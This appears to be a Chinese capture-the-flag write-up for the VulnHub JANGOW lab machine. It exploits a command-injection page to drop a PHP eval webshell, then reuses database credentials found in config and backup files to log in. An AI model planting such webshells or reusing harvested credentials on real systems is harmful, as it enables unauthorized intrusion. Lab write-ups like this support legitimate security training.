VulnHub JANGOW

提示(主机ip分配问题)

因为直接在VulnHub上下载的盒子,在VMware上打开,默认是不分配主机的

所以我们可以在VirtualBox上打开

一、信息收集

发现开放了21和80端口,查看一下80端口

80端口:

检查页面后发现Buscar页面有个可疑的地方:

试下,有命令执行

直接写入一句话木马试一下:

echo '<?php eval($_POST["sain"]);' > shell.php

利用命令执行,看到有shell.php,说明上传成功

连接成功。简单查看一下文件,在/var/www/html/site/wordpress下也发现了配置文件:

除此之外发现在/var/www/html下有一个./backup文件:

发现都是数据库的用户名和密码,但是jangow01和系统名字一样,所以我就尝试下直接登录系统,发现可以直接登陆进去:

username = "jangow01"password = "abygurl69"

拿到了user_flag

相关推荐
用户27784491049937 小时前
借助DeepSeek智能生成测试用例:从提示词到Excel表格的全流程实践
人工智能·python
JavaEdge在掘金9 小时前
ssl.SSLCertVerificationError报错解决方案
python
我不会编程5559 小时前
Python Cookbook-5.1 对字典排序
开发语言·数据结构·python
老歌老听老掉牙10 小时前
平面旋转与交线投影夹角计算
python·线性代数·平面·sympy
满怀101510 小时前
Python入门(7):模块
python
无名之逆10 小时前
Rust 开发提效神器:lombok-macros 宏库
服务器·开发语言·前端·数据库·后端·python·rust
大丈夫立于天地间10 小时前
ISIS协议中的数据库同步
运维·网络·信息与通信
你觉得20510 小时前
哈尔滨工业大学DeepSeek公开课:探索大模型原理、技术与应用从GPT到DeepSeek|附视频与讲义下载方法
大数据·人工智能·python·gpt·学习·机器学习·aigc
cg501710 小时前
Spring Boot 的配置文件
java·linux·spring boot
Dream Algorithm10 小时前
路由器的 WAN(广域网)口 和 LAN(局域网)口
网络·智能路由器